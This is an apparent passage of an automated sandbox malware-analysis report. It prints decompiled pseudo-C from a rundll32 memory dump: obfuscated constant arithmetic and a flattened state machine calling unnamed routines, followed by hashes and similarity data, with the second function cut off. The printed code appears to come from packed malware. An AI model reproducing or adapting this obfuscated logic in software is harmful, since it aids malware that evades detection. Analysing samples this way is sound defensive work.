                                                                                                                                    				_v252 = 0x4ff2e7;
                                                                                                                                    				_t969 = 0xc;
                                                                                                                                    				_v252 = _v252 / _t969;
                                                                                                                                    				_v252 = _v252 << 6;
                                                                                                                                    				_v252 = _v252 << 0xc;
                                                                                                                                    				_v252 = _v252 ^ 0xa6466867;
                                                                                                                                    				_v80 = 0x4d7637;
                                                                                                                                    				_v80 = _v80 + 0xd199;
                                                                                                                                    				_v80 = _v80 ^ 0x004dfa45;
                                                                                                                                    				_v24 = 0xfee4b3;
                                                                                                                                    				_t970 = 0x3e;
                                                                                                                                    				_v24 = _v24 * 0x23;
                                                                                                                                    				_v24 = _v24 ^ 0x22d37c34;
                                                                                                                                    				_v204 = 0x24209;
                                                                                                                                    				_v204 = _v204 + 0xffffcebc;
                                                                                                                                    				_v204 = _v204 ^ 0x847f2e61;
                                                                                                                                    				_v204 = _v204 + 0xffff5302;
                                                                                                                                    				_v204 = _v204 ^ 0x847f4f7c;
                                                                                                                                    				_v260 = 0x4a587;
                                                                                                                                    				_v260 = _v260 * 0x4a;
                                                                                                                                    				_v260 = _v260 + 0xffff9bf3;
                                                                                                                                    				_v260 = _v260 + 0xffff92e5;
                                                                                                                                    				_v260 = _v260 ^ 0x015b504d;
                                                                                                                                    				_v164 = 0x6d05db;
                                                                                                                                    				_v164 = _v164 * 0x14;
                                                                                                                                    				_v164 = _v164 >> 4;
                                                                                                                                    				_v164 = _v164 ^ 0x556abaa4;
                                                                                                                                    				_v164 = _v164 ^ 0x55e01079;
                                                                                                                                    				_v20 = 0x80cc5b;
                                                                                                                                    				_v20 = _v20 >> 0xd;
                                                                                                                                    				_v20 = _v20 ^ 0x000efc86;
                                                                                                                                    				_v104 = 0xc8e6e2;
                                                                                                                                    				_v104 = _v104 << 8;
                                                                                                                                    				_v104 = _v104 >> 0x10;
                                                                                                                                    				_v104 = _v104 ^ 0x000afff3;
                                                                                                                                    				_v272 = 0x560e69;
                                                                                                                                    				_v272 = _v272 + 0x2793;
                                                                                                                                    				_v272 = _v272 * 0xe;
                                                                                                                                    				_v272 = _v272 + 0xc902;
                                                                                                                                    				_v272 = _v272 ^ 0x04bc6edc;
                                                                                                                                    				_v16 = 0xfcaf67;
                                                                                                                                    				_v16 = _v16 / _t970;
                                                                                                                                    				_v16 = _v16 ^ 0x000c0ba9;
                                                                                                                                    				_v56 = 0x81a14f;
                                                                                                                                    				_v56 = _v56 >> 0xb;
                                                                                                                                    				_v56 = _v56 ^ 0x000fb9cd;
                                                                                                                                    				_v32 = 0x24333c;
                                                                                                                                    				_v32 = _v32 / _t985;
                                                                                                                                    				_v32 = _v32 ^ 0x00065bee;
                                                                                                                                    				_v124 = 0xe3a445;
                                                                                                                                    				_v124 = _v124 >> 5;
                                                                                                                                    				_v124 = _v124 >> 7;
                                                                                                                                    				_v124 = _v124 ^ 0x0000dfdf;
                                                                                                                                    				_v220 = 0x5f21d9;
                                                                                                                                    				_t971 = 0x79;
                                                                                                                                    				_v220 = _v220 * 0x54;
                                                                                                                                    				_v220 = _v220 << 5;
                                                                                                                                    				_v220 = _v220 ^ 0x0e372a7b;
                                                                                                                                    				_v220 = _v220 ^ 0xe8dc9c41;
                                                                                                                                    				_v188 = 0xc44d01;
                                                                                                                                    				_v188 = _v188 ^ 0x0373dd04;
                                                                                                                                    				_v188 = _v188 * 0x30;
                                                                                                                                    				_v188 = _v188 ^ 0xfb03bbf0;
                                                                                                                                    				_v188 = _v188 ^ 0x496460ca;
                                                                                                                                    				_v268 = 0x8213af;
                                                                                                                                    				_v268 = _v268 ^ 0x6d9501b2;
                                                                                                                                    				_v268 = _v268 | 0x4d165578;
                                                                                                                                    				_v268 = _v268 >> 4;
                                                                                                                                    				_v268 = _v268 ^ 0x06d55fab;
                                                                                                                                    				_v212 = 0x705526;
                                                                                                                                    				_v212 = _v212 >> 0xa;
                                                                                                                                    				_v212 = _v212 << 9;
                                                                                                                                    				_v212 = _v212 >> 8;
                                                                                                                                    				_v212 = _v212 ^ 0x000b72c4;
                                                                                                                                    				_v92 = 0xc8093b;
                                                                                                                                    				_v92 = _v92 + 0xd043;
                                                                                                                                    				_v92 = _v92 ^ 0x00ca3bde;
                                                                                                                                    				_v264 = 0x1f9619;
                                                                                                                                    				_v264 = _v264 + 0xffffbc34;
                                                                                                                                    				_v264 = _v264 * 0x3e;
                                                                                                                                    				_v264 = _v264 * 0x52;
                                                                                                                                    				_v264 = _v264 ^ 0x6e0edc82;
                                                                                                                                    				_v96 = 0x6d9960;
                                                                                                                                    				_v96 = _v96 | 0x9fb7a8f9;
                                                                                                                                    				_v96 = _v96 ^ 0x9ff35e32;
                                                                                                                                    				_v144 = 0x447df2;
                                                                                                                                    				_v144 = _v144 << 8;
                                                                                                                                    				_v144 = _v144 + 0xffff6cb2;
                                                                                                                                    				_v144 = _v144 ^ 0x44714589;
                                                                                                                                    				_v240 = 0x65db08;
                                                                                                                                    				_v240 = _v240 * 6;
                                                                                                                                    				_v240 = _v240 + 0x5f97;
                                                                                                                                    				_v240 = _v240 >> 0xd;
                                                                                                                                    				_v240 = _v240 ^ 0x000293b4;
                                                                                                                                    				_v84 = 0x3c7c20;
                                                                                                                                    				_v84 = _v84 ^ 0x2c3d49c2;
                                                                                                                                    				_v84 = _v84 ^ 0x2c080053;
                                                                                                                                    				_v248 = 0x13c85;
                                                                                                                                    				_v248 = _v248 + 0x8cd8;
                                                                                                                                    				_v248 = _v248 + 0x6e3d;
                                                                                                                                    				_v248 = _v248 ^ 0xe59eace5;
                                                                                                                                    				_v248 = _v248 ^ 0xe5984999;
                                                                                                                                    				_v216 = 0x6164ef;
                                                                                                                                    				_v216 = _v216 << 6;
                                                                                                                                    				_v216 = _v216 + 0xffff2edc;
                                                                                                                                    				_v216 = _v216 | 0xa66c888f;
                                                                                                                                    				_v216 = _v216 ^ 0xbe7947d5;
                                                                                                                                    				_v232 = 0x991e82;
                                                                                                                                    				_v232 = _v232 + 0xffff48fb;
                                                                                                                                    				_v232 = _v232 >> 0xe;
                                                                                                                                    				_v232 = _v232 | 0x69e4ac2c;
                                                                                                                                    				_v232 = _v232 ^ 0x69ef7d1b;
                                                                                                                                    				_v68 = 0x9d94b2;
                                                                                                                                    				_v68 = _v68 | 0xcead792c;
                                                                                                                                    				_v68 = _v68 ^ 0xceb9e800;
                                                                                                                                    				_v44 = 0x20071e;
                                                                                                                                    				_v44 = _v44 / _t971;
                                                                                                                                    				_v44 = _v44 ^ 0x000a654c;
                                                                                                                                    				_v128 = 0x223cb7;
                                                                                                                                    				_v128 = _v128 + 0x9bf0;
                                                                                                                                    				_v128 = _v128 | 0x79b7d361;
                                                                                                                                    				_v128 = _v128 ^ 0x79b3b147;
                                                                                                                                    				_v52 = 0x8ed203;
                                                                                                                                    				_v52 = _v52 + 0xffff1a7b;
                                                                                                                                    				_v52 = _v52 ^ 0x008be8c4;
                                                                                                                                    				_v208 = 0xe0ac17;
                                                                                                                                    				_v208 = _v208 ^ 0xbcfe8cf2;
                                                                                                                                    				_t972 = 0x6b;
                                                                                                                                    				_v208 = _v208 / _t972;
                                                                                                                                    				_v208 = _v208 | 0x3ee9ec5f;
                                                                                                                                    				_v208 = _v208 ^ 0x3fec9c1d;
                                                                                                                                    				_v192 = 0x219bfa;
                                                                                                                                    				_v192 = _v192 >> 4;
                                                                                                                                    				_v192 = _v192 + 0x77e4;
                                                                                                                                    				_v192 = _v192 | 0x2fb4141c;
                                                                                                                                    				_v192 = _v192 ^ 0x2fb2076e;
                                                                                                                                    				_v200 = 0x8926e2;
                                                                                                                                    				_v200 = _v200 << 4;
                                                                                                                                    				_t973 = 0xc;
                                                                                                                                    				_v200 = _v200 / _t973;
                                                                                                                                    				_v200 = _v200 + 0xffff5704;
                                                                                                                                    				_v200 = _v200 ^ 0x00bbfbcc;
                                                                                                                                    				_v284 = 0xaed0cb;
                                                                                                                                    				_v284 = _v284 + 0x9c17;
                                                                                                                                    				_v284 = _v284 + 0xaf6d;
                                                                                                                                    				_v284 = _v284 ^ 0x00b89bc1;
                                                                                                                                    				_v168 = 0x914ce9;
                                                                                                                                    				_v168 = _v168 | 0xceb3d4af;
                                                                                                                                    				_v168 = _v168 ^ 0x5adaba1c;
                                                                                                                                    				_v168 = _v168 ^ 0x3c292fbf;
                                                                                                                                    				_v168 = _v168 ^ 0xa84ea968;
                                                                                                                                    				_v156 = 0x90c891;
                                                                                                                                    				_v156 = _v156 + 0xffff3667;
                                                                                                                                    				_t974 = 0x5c;
                                                                                                                                    				_v156 = _v156 / _t974;
                                                                                                                                    				_t975 = 0x3c;
                                                                                                                                    				_v156 = _v156 / _t975;
                                                                                                                                    				_v156 = _v156 ^ 0x000da682;
                                                                                                                                    				_v140 = 0xffcb83;
                                                                                                                                    				_v140 = _v140 << 0xd;
                                                                                                                                    				_v140 = _v140 | 0xcebab625;
                                                                                                                                    				_v140 = _v140 ^ 0xfff71570;
                                                                                                                                    				_v280 = 0xfef1ee;
                                                                                                                                    				_v280 = _v280 >> 8;
                                                                                                                                    				_v280 = _v280 + 0xffff306e;
                                                                                                                                    				_v280 = _v280 | 0x3331510b;
                                                                                                                                    				_v280 = _v280 ^ 0x3338227a;
                                                                                                                                    				_v176 = 0xc7331d;
                                                                                                                                    				_v176 = _v176 >> 7;
                                                                                                                                    				_v176 = _v176 + 0x1d50;
                                                                                                                                    				_v176 = _v176 << 5;
                                                                                                                                    				_v176 = _v176 ^ 0x00370898;
                                                                                                                                    				_v288 = 0x519041;
                                                                                                                                    				_v288 = _v288 + 0x7cd9;
                                                                                                                                    				_v288 = _v288 ^ 0x0057f5a9;
                                                                                                                                    				_t976 = _v12;
                                                                                                                                    				_t986 = _v12;
                                                                                                                                    				while(1) {
                                                                                                                                    					L1:
                                                                                                                                    					_t939 = 0x68a9e90;
                                                                                                                                    					while(1) {
                                                                                                                                    						_t823 = _v184;
                                                                                                                                    						while(1) {
                                                                                                                                    							L3:
                                                                                                                                    							_t991 = _t977 - _t939;
                                                                                                                                    							if(_t991 > 0) {
                                                                                                                                    								break;
                                                                                                                                    							}
                                                                                                                                    							if(_t991 == 0) {
                                                                                                                                    								__eflags =  *_v8;
                                                                                                                                    								if(__eflags != 0) {
                                                                                                                                    									_push(_v104);
                                                                                                                                    									_push(_v20);
                                                                                                                                    									_t868 = E002DDCF7(_v164, 0x2c1524, __eflags);
                                                                                                                                    									_v276 = _t868;
                                                                                                                                    								}
                                                                                                                                    								_t845 = _v244 | _v196 | _v108 | _v236 | _v132 | _v172 | _v64 | _v228 | _v116;
                                                                                                                                    								_t981 = _a44 & 1;
                                                                                                                                    								__eflags = _t981;
                                                                                                                                    								if(_t981 != 0) {
                                                                                                                                    									__eflags = _t845;
                                                                                                                                    								}
                                                                                                                                    								_push(_t868);
                                                                                                                                    								_t976 = E002C75FA(_t868, _t845, _v272, _t868, _v16, _a16, _v56, _v32, _v124, _t868, _v220, _v188, _v184);
                                                                                                                                    								E002CA8B0(_v268, _v276, _v212);
                                                                                                                                    								_t988 =  &(_t988[0xe]);
                                                                                                                                    								__eflags = _t976;
                                                                                                                                    								if(_t976 == 0) {
                                                                                                                                    									_t977 = 0x51daea9;
                                                                                                                                    								} else {
                                                                                                                                    									_push(_v96);
                                                                                                                                    									_push(_v264);
                                                                                                                                    									_push(_v256);
                                                                                                                                    									_v60 = 1;
                                                                                                                                    									_push( &_v60);
                                                                                                                                    									_push(_v92);
                                                                                                                                    									_t948 = 4;
                                                                                                                                    									E002C9670(_t976, _t948);
                                                                                                                                    									_t988 =  &(_t988[5]);
                                                                                                                                    									__eflags = _t981;
                                                                                                                                    									if(_t981 != 0) {
                                                                                                                                    										E002D408E( &_v12, _v76, _v144, _v240, _t976,  &_v60, _v84, _v248);
                                                                                                                                    										_t732 =  &_v60;
                                                                                                                                    										 *_t732 = _v60 | _v136;
                                                                                                                                    										__eflags =  *_t732;
                                                                                                                                    										E002C9670(_t976, _v12, _v216,  &_v60, _v224, _v232, _v68);
                                                                                                                                    										_t988 =  &(_t988[0xb]);
                                                                                                                                    									}
                                                                                                                                    									_t977 = 0xbee37f5;
                                                                                                                                    								}
                                                                                                                                    								L11:
                                                                                                                                    								_t868 = _v276;
                                                                                                                                    								goto L1;
                                                                                                                                    							}
                                                                                                                                    							if(_t977 == 0x2602436) {
                                                                                                                                    								_t977 = 0x506ebc3;
                                                                                                                                    								continue;
                                                                                                                                    							}
                                                                                                                                    							if(_t977 == 0x329d839) {
                                                                                                                                    								_t977 = 0x2602436;
                                                                                                                                    								continue;
                                                                                                                                    							}
                                                                                                                                    							if(_t977 == 0x4bb42fe) {
                                                                                                                                    								_t823 = E002C88C3(_v100, _v148, _v40, _t868, _t868, _t986, _v252, _v80, _a36, _v24, _t868, _v4, _t868, _v204, _v260);
                                                                                                                                    								_t868 = _v276;
                                                                                                                                    								_t988 =  &(_t988[0xd]);
                                                                                                                                    								__eflags = _t823;
                                                                                                                                    								_v184 = _t823;
                                                                                                                                    								_t939 = 0x68a9e90;
                                                                                                                                    								_t977 =  !=  ? 0x68a9e90 : 0x9a35046;
                                                                                                                                    								continue;
                                                                                                                                    							}
                                                                                                                                    							if(_t977 == 0x506ebc3) {
                                                                                                                                    								_push(_t868);
                                                                                                                                    								_push(_v72);
                                                                                                                                    								_push(_v160);
                                                                                                                                    								_push(_v28);
                                                                                                                                    								_push(_v152);
                                                                                                                                    								_t858 = E002DDAC6(_v112, _v180);
                                                                                                                                    								_t986 = _t858;
                                                                                                                                    								__eflags = _t858;
                                                                                                                                    								_t977 =  !=  ? 0x4bb42fe : 0xdf8c541;
                                                                                                                                    								E002D8519(_v88, _v48, 0);
                                                                                                                                    								_t988 = _t988 - 0xc + 0x24;
                                                                                                                                    								L37:
                                                                                                                                    								_t868 = _v276;
                                                                                                                                    								_t939 = 0x68a9e90;
                                                                                                                                    								L38:
                                                                                                                                    								__eflags = _t977 - 0xdf8c541;
                                                                                                                                    								if(_t977 == 0xdf8c541) {
                                                                                                                                    									L41:
                                                                                                                                    									return _t862;
                                                                                                                                    								}
                                                                                                                                    								_t823 = _v184;
                                                                                                                                    								continue;
                                                                                                                                    							}
                                                                                                                                    							if(_t977 != 0x51daea9) {
                                                                                                                                    								goto L38;
                                                                                                                                    							}
                                                                                                                                    							E002C2B62(_v168, _t823, _v156, _v140);
                                                                                                                                    							_t977 = 0x9a35046;
                                                                                                                                    							goto L11;
                                                                                                                                    						}
                                                                                                                                    						__eflags = _t977 - 0x81a6b17;
                                                                                                                                    						if(_t977 == 0x81a6b17) {
                                                                                                                                    							E002C2B62(_v192, _t976, _v200, _v284);
                                                                                                                                    							_t977 = 0x51daea9;
                                                                                                                                    							goto L37;
                                                                                                                                    						}
                                                                                                                                    						__eflags = _t977 - 0x9a35046;
                                                                                                                                    						if(_t977 == 0x9a35046) {
                                                                                                                                    							E002C2B62(_v280, _t986, _v176, _v288);
                                                                                                                                    							goto L41;
                                                                                                                                    						}
                                                                                                                                    						__eflags = _t977 - 0xb70b8d2;
                                                                                                                                    						if(_t977 == 0xb70b8d2) {
                                                                                                                                    							__eflags = E002DA2E8(_t976, _a4);
                                                                                                                                    							_t977 = 0x81a6b17;
                                                                                                                                    							_t829 = 1;
                                                                                                                                    							_t862 =  !=  ? _t829 : _t862;
                                                                                                                                    							goto L11;
                                                                                                                                    						}
                                                                                                                                    						__eflags = _t977 - 0xba06d79;
                                                                                                                                    						if(__eflags == 0) {
                                                                                                                                    							__eflags = E002E09B5(_t976, _v120, __eflags) - _v36;
                                                                                                                                    							_t977 =  ==  ? 0xb70b8d2 : 0x81a6b17;
                                                                                                                                    							goto L11;
                                                                                                                                    						}
                                                                                                                                    						__eflags = _t977 - 0xbee37f5;
                                                                                                                                    						if(_t977 != 0xbee37f5) {
                                                                                                                                    							goto L38;
                                                                                                                                    						}
                                                                                                                                    						_t832 = _v8;
                                                                                                                                    						_t888 =  *_t832;
                                                                                                                                    						__eflags = _t888;
                                                                                                                                    						if(_t888 == 0) {
                                                                                                                                    							_t833 = 0;
                                                                                                                                    							__eflags = 0;
                                                                                                                                    						} else {
                                                                                                                                    							_t833 = _t832[1];
                                                                                                                                    						}
                                                                                                                                    						E002C2AE4(_v44, _t888, _t888, _a24, _t976, _v52, _t833, _v208);
                                                                                                                                    						_t988 =  &(_t988[7]);
                                                                                                                                    						asm("sbb esi, esi");
                                                                                                                                    						_t977 = (_t977 & 0x03860262) + 0x81a6b17;
                                                                                                                                    						goto L11;
                                                                                                                                    					}
                                                                                                                                    				}
                                                                                                                                    			}

                                                                                                                                    0x002de846
                                                                                                                                    0x002de84e
                                                                                                                                    0x002de859
                                                                                                                                    0x002de861
                                                                                                                                    0x002de869
                                                                                                                                    0x002de874
                                                                                                                                    0x002de87f
                                                                                                                                    0x002de88a
                                                                                                                                    0x002de895
                                                                                                                                    0x002de8a0
                                                                                                                                    0x002de8ab
                                                                                                                                    0x002de8b6
                                                                                                                                    0x002de8be
                                                                                                                                    0x002de8d0
                                                                                                                                    0x002de8d5
                                                                                                                                    0x002de8de
                                                                                                                                    0x002de8e9
                                                                                                                                    0x002de8f4
                                                                                                                                    0x002de8ff
                                                                                                                                    0x002de90a
                                                                                                                                    0x002de915
                                                                                                                                    0x002de920
                                                                                                                                    0x002de932
                                                                                                                                    0x002de935
                                                                                                                                    0x002de93c
                                                                                                                                    0x002de947
                                                                                                                                    0x002de952
                                                                                                                                    0x002de95d
                                                                                                                                    0x002de968
                                                                                                                                    0x002de973
                                                                                                                                    0x002de97e
                                                                                                                                    0x002de989
                                                                                                                                    0x002de99f
                                                                                                                                    0x002de9a4
                                                                                                                                    0x002de9ab
                                                                                                                                    0x002de9b6
                                                                                                                                    0x002de9ca
                                                                                                                                    0x002de9cf
                                                                                                                                    0x002de9d6
                                                                                                                                    0x002de9de
                                                                                                                                    0x002de9e9
                                                                                                                                    0x002de9f7
                                                                                                                                    0x002de9fc
                                                                                                                                    0x002dea00
                                                                                                                                    0x002dea05
                                                                                                                                    0x002dea0a
                                                                                                                                    0x002dea12
                                                                                                                                    0x002dea1d
                                                                                                                                    0x002dea28
                                                                                                                                    0x002dea33
                                                                                                                                    0x002dea48
                                                                                                                                    0x002dea49
                                                                                                                                    0x002dea50
                                                                                                                                    0x002dea5b
                                                                                                                                    0x002dea63
                                                                                                                                    0x002dea6b
                                                                                                                                    0x002dea73
                                                                                                                                    0x002dea7b
                                                                                                                                    0x002dea83
                                                                                                                                    0x002dea90
                                                                                                                                    0x002dea94
                                                                                                                                    0x002dea9c
                                                                                                                                    0x002deaa4
                                                                                                                                    0x002deaac
                                                                                                                                    0x002deabf
                                                                                                                                    0x002deac6
                                                                                                                                    0x002deace
                                                                                                                                    0x002dead9
                                                                                                                                    0x002deae4
                                                                                                                                    0x002deaef
                                                                                                                                    0x002deaf7
                                                                                                                                    0x002deb02
                                                                                                                                    0x002deb0d
                                                                                                                                    0x002deb15
                                                                                                                                    0x002deb1d
                                                                                                                                    0x002deb28
                                                                                                                                    0x002deb30
                                                                                                                                    0x002deb3d
                                                                                                                                    0x002deb41
                                                                                                                                    0x002deb49
                                                                                                                                    0x002deb51
                                                                                                                                    0x002deb67
                                                                                                                                    0x002deb6e
                                                                                                                                    0x002deb79
                                                                                                                                    0x002deb84
                                                                                                                                    0x002deb8c
                                                                                                                                    0x002deb97
                                                                                                                                    0x002debab
                                                                                                                                    0x002debb2
                                                                                                                                    0x002debbd
                                                                                                                                    0x002debc8
                                                                                                                                    0x002debd2
                                                                                                                                    0x002debda
                                                                                                                                    0x002debe5
                                                                                                                                    0x002debf4
                                                                                                                                    0x002debf5
                                                                                                                                    0x002debf9
                                                                                                                                    0x002debfe
                                                                                                                                    0x002dec06
                                                                                                                                    0x002dec0e
                                                                                                                                    0x002dec16
                                                                                                                                    0x002dec23
                                                                                                                                    0x002dec27
                                                                                                                                    0x002dec2f
                                                                                                                                    0x002dec37
                                                                                                                                    0x002dec3f
                                                                                                                                    0x002dec47
                                                                                                                                    0x002dec4f
                                                                                                                                    0x002dec54
                                                                                                                                    0x002dec5c
                                                                                                                                    0x002dec64
                                                                                                                                    0x002dec69
                                                                                                                                    0x002dec6e
                                                                                                                                    0x002dec73
                                                                                                                                    0x002dec7b
                                                                                                                                    0x002dec86
                                                                                                                                    0x002dec91
                                                                                                                                    0x002dec9c
                                                                                                                                    0x002deca4
                                                                                                                                    0x002decb1
                                                                                                                                    0x002decba
                                                                                                                                    0x002decbe
                                                                                                                                    0x002decc6
                                                                                                                                    0x002decd1
                                                                                                                                    0x002decdc
                                                                                                                                    0x002dece7
                                                                                                                                    0x002decf2
                                                                                                                                    0x002decfa
                                                                                                                                    0x002ded05
                                                                                                                                    0x002ded10
                                                                                                                                    0x002ded1d
                                                                                                                                    0x002ded21
                                                                                                                                    0x002ded29
                                                                                                                                    0x002ded2e
                                                                                                                                    0x002ded36
                                                                                                                                    0x002ded41
                                                                                                                                    0x002ded4c
                                                                                                                                    0x002ded57
                                                                                                                                    0x002ded5f
                                                                                                                                    0x002ded67
                                                                                                                                    0x002ded6f
                                                                                                                                    0x002ded77
                                                                                                                                    0x002ded7f
                                                                                                                                    0x002ded87
                                                                                                                                    0x002ded8c
                                                                                                                                    0x002ded94
                                                                                                                                    0x002ded9c
                                                                                                                                    0x002deda4
                                                                                                                                    0x002dedac
                                                                                                                                    0x002dedb4
                                                                                                                                    0x002dedb9
                                                                                                                                    0x002dedc1
                                                                                                                                    0x002dedc9
                                                                                                                                    0x002dedd4
                                                                                                                                    0x002deddf
                                                                                                                                    0x002dedea
                                                                                                                                    0x002dedfe
                                                                                                                                    0x002dee05
                                                                                                                                    0x002dee10
                                                                                                                                    0x002dee1b
                                                                                                                                    0x002dee26
                                                                                                                                    0x002dee31
                                                                                                                                    0x002dee3c
                                                                                                                                    0x002dee49
                                                                                                                                    0x002dee54
                                                                                                                                    0x002dee5f
                                                                                                                                    0x002dee67
                                                                                                                                    0x002dee75
                                                                                                                                    0x002dee7a
                                                                                                                                    0x002dee80
                                                                                                                                    0x002dee88
                                                                                                                                    0x002dee90
                                                                                                                                    0x002dee98
                                                                                                                                    0x002dee9d
                                                                                                                                    0x002deea5
                                                                                                                                    0x002deead
                                                                                                                                    0x002deeb5
                                                                                                                                    0x002deebd
                                                                                                                                    0x002deec6
                                                                                                                                    0x002deecb
                                                                                                                                    0x002deed1
                                                                                                                                    0x002deed9
                                                                                                                                    0x002deee1
                                                                                                                                    0x002deee9
                                                                                                                                    0x002deef1
                                                                                                                                    0x002deef9
                                                                                                                                    0x002def01
                                                                                                                                    0x002def0c
                                                                                                                                    0x002def17
                                                                                                                                    0x002def22
                                                                                                                                    0x002def2d
                                                                                                                                    0x002def38
                                                                                                                                    0x002def43
                                                                                                                                    0x002def55
                                                                                                                                    0x002def5a
                                                                                                                                    0x002def6a

                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464808022.00000000002C1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464801297.00000000002C0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                    • Associated: 00000009.00000002.464824952.00000000002E3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_2c0000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: |<$!b$$Fy$&Up$*b$7vM$<3$$=n$C$K1$Le$PZY$S$_>$z"83$u$0G$da$w
                                                                                                                                    • API String ID: 0-3417817227
                                                                                                                                    • Opcode ID: aaf58db1450ab86f8ac7691c79affbc9a373a67e4cff106889725d41b48b728d
                                                                                                                                    • Instruction ID: 028fd8b269b75bca2b78e74e208e9cd222402d31168e1f801fc022e3eef73469
                                                                                                                                    • Opcode Fuzzy Hash: aaf58db1450ab86f8ac7691c79affbc9a373a67e4cff106889725d41b48b728d
                                                                                                                                    • Instruction Fuzzy Hash: 8E820071508381CFD378CF25C54AA8BBBE1BBD4718F108A2DE5DA96260D7B48959CF43
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    C-Code - Quality: 96%
                                                                                                                                    			E002CBB7E(intOrPtr* __ecx) {
                                                                                                                                    				char _v68;
                                                                                                                                    				char _v76;
                                                                                                                                    				void* _v88;
                                                                                                                                    				intOrPtr _v92;
                                                                                                                                    				intOrPtr _v96;
                                                                                                                                    				intOrPtr* _v100;
                                                                                                                                    				char _v104;
                                                                                                                                    				char _v108;
                                                                                                                                    				char _v112;
                                                                                                                                    				char _v116;
                                                                                                                                    				char _v120;
                                                                                                                                    				signed int _v124;
                                                                                                                                    				signed int _v128;
                                                                                                                                    				signed int _v132;
                                                                                                                                    				signed int _v136;
                                                                                                                                    				signed int _v140;
                                                                                                                                    				signed int _v144;
                                                                                                                                    				signed int _v148;
                                                                                                                                    				signed int _v152;
                                                                                                                                    				signed int _v156;
                                                                                                                                    				signed int _v160;
                                                                                                                                    				signed int _v164;
                                                                                                                                    				signed int _v168;
                                                                                                                                    				signed int _v172;
                                                                                                                                    				signed int _v176;
                                                                                                                                    				signed int _v180;
                                                                                                                                    				signed int _v184;
                                                                                                                                    				signed int _v188;
                                                                                                                                    				signed int _v192;
                                                                                                                                    				signed int _v196;
                                                                                                                                    				signed int _v200;
                                                                                                                                    				signed int _v204;
                                                                                                                                    				signed int _v208;
                                                                                                                                    				signed int _v212;
                                                                                                                                    				signed int _v216;
                                                                                                                                    				signed int _v220;
                                                                                                                                    				signed int _v224;
                                                                                                                                    				signed int _v228;
                                                                                                                                    				signed int _v232;
                                                                                                                                    				signed int _v236;
                                                                                                                                    				signed int _v240;
                                                                                                                                    				signed int _v244;
                                                                                                                                    				signed int _v248;
                                                                                                                                    				signed int _v252;
                                                                                                                                    				signed int _v256;
                                                                                                                                    				signed int _v260;
                                                                                                                                    				signed int _v264;
                                                                                                                                    				signed int _v268;
                                                                                                                                    				signed int _v272;
                                                                                                                                    				signed int _v276;
                                                                                                                                    				signed int _v280;
                                                                                                                                    				signed int _v284;
                                                                                                                                    				signed int _v288;
                                                                                                                                    				signed int _v292;
                                                                                                                                    				signed int _v296;
                                                                                                                                    				signed int _v300;
                                                                                                                                    				signed int _v304;
                                                                                                                                    				signed int _v308;
                                                                                                                                    				signed int _v312;
                                                                                                                                    				signed int _v316;
                                                                                                                                    				signed int _v320;
                                                                                                                                    				signed int _v324;
                                                                                                                                    				signed int _v328;
                                                                                                                                    				signed int _v332;
                                                                                                                                    				signed int _v336;
                                                                                                                                    				signed int _v340;
                                                                                                                                    				signed int _v344;
                                                                                                                                    				signed int _v348;
                                                                                                                                    				signed int _v352;
                                                                                                                                    				signed int _v356;
                                                                                                                                    				signed int _v360;
                                                                                                                                    				signed int _v364;
                                                                                                                                    				signed int _v368;
                                                                                                                                    				signed int _v372;
                                                                                                                                    				signed int _v376;
                                                                                                                                    				signed int _v380;
                                                                                                                                    				signed int _v384;
                                                                                                                                    				void* _t690;
                                                                                                                                    				void* _t691;
                                                                                                                                    				void* _t697;
                                                                                                                                    				void* _t700;
                                                                                                                                    				void* _t701;
                                                                                                                                    				void* _t704;
                                                                                                                                    				void* _t710;
                                                                                                                                    				char _t711;
                                                                                                                                    				void* _t713;
                                                                                                                                    				void* _t717;
                                                                                                                                    				void* _t719;
                                                                                                                                    				void* _t725;
                                                                                                                                    				signed int _t732;
                                                                                                                                    				signed int _t733;
                                                                                                                                    				signed int _t734;
                                                                                                                                    				signed int _t735;
                                                                                                                                    				signed int _t736;
                                                                                                                                    				signed int _t737;
                                                                                                                                    				signed int _t738;
                                                                                                                                    				signed int _t739;
                                                                                                                                    				signed int _t740;
                                                                                                                                    				signed int _t741;
                                                                                                                                    				signed int _t742;
                                                                                                                                    				signed int _t743;
                                                                                                                                    				signed int _t744;
                                                                                                                                    				signed int _t745;
                                                                                                                                    				signed int _t746;
                                                                                                                                    				void* _t747;
                                                                                                                                    				void* _t763;
                                                                                                                                    				void* _t772;
                                                                                                                                    				void* _t819;
                                                                                                                                    				intOrPtr _t834;
                                                                                                                                    				void* _t840;
                                                                                                                                    				void* _t842;
                                                                                                                                    				void* _t846;
                                                                                                                                    				void* _t847;
                                                                                                                                    				void* _t850;
                                                                                                                                    
                                                                                                                                    				_v92 = 0xf68129;
                                                                                                                                    				_v100 = __ecx;
                                                                                                                                    				asm("stosd");
                                                                                                                                    				_t732 = 0x6b;
                                                                                                                                    				asm("stosd");
                                                                                                                                    				_t846 = 0;
                                                                                                                                    				_t725 = 0x7252bf3;
                                                                                                                                    				asm("stosd");
                                                                                                                                    				_v136 = 0x5ab987;
                                                                                                                                    				_v136 = _v136 * 0x2c;
                                                                                                                                    				_v136 = _v136 ^ 0x0f97e334;
                                                                                                                                    				_v240 = 0x5f59f0;
                                                                                                                                    				_v240 = _v240 << 5;
                                                                                                                                    				_v240 = _v240 * 0x46;
                                                                                                                                    				_v240 = _v240 ^ 0x4252f400;
                                                                                                                                    				_v320 = 0x63212;
                                                                                                                                    				_v320 = _v320 + 0xffffd9b7;
                                                                                                                                    				_v320 = _v320 * 0x26;
                                                                                                                                    				_v320 = _v320 + 0xffff4af1;
                                                                                                                                    				_v320 = _v320 ^ 0x00e50ac7;
                                                                                                                                    				_v192 = 0x354250;
                                                                                                                                    				_t26 =  &_v192; // 0x354250
                                                                                                                                    				_v192 =  *_t26 * 0x43;
                                                                                                                                    				_v192 = _v192 ^ 0x0df05af0;
                                                                                                                                    				_v308 = 0x42c709;
                                                                                                                                    				_v308 = _v308 | 0x3400f9ef;
                                                                                                                                    				_v308 = _v308 << 3;
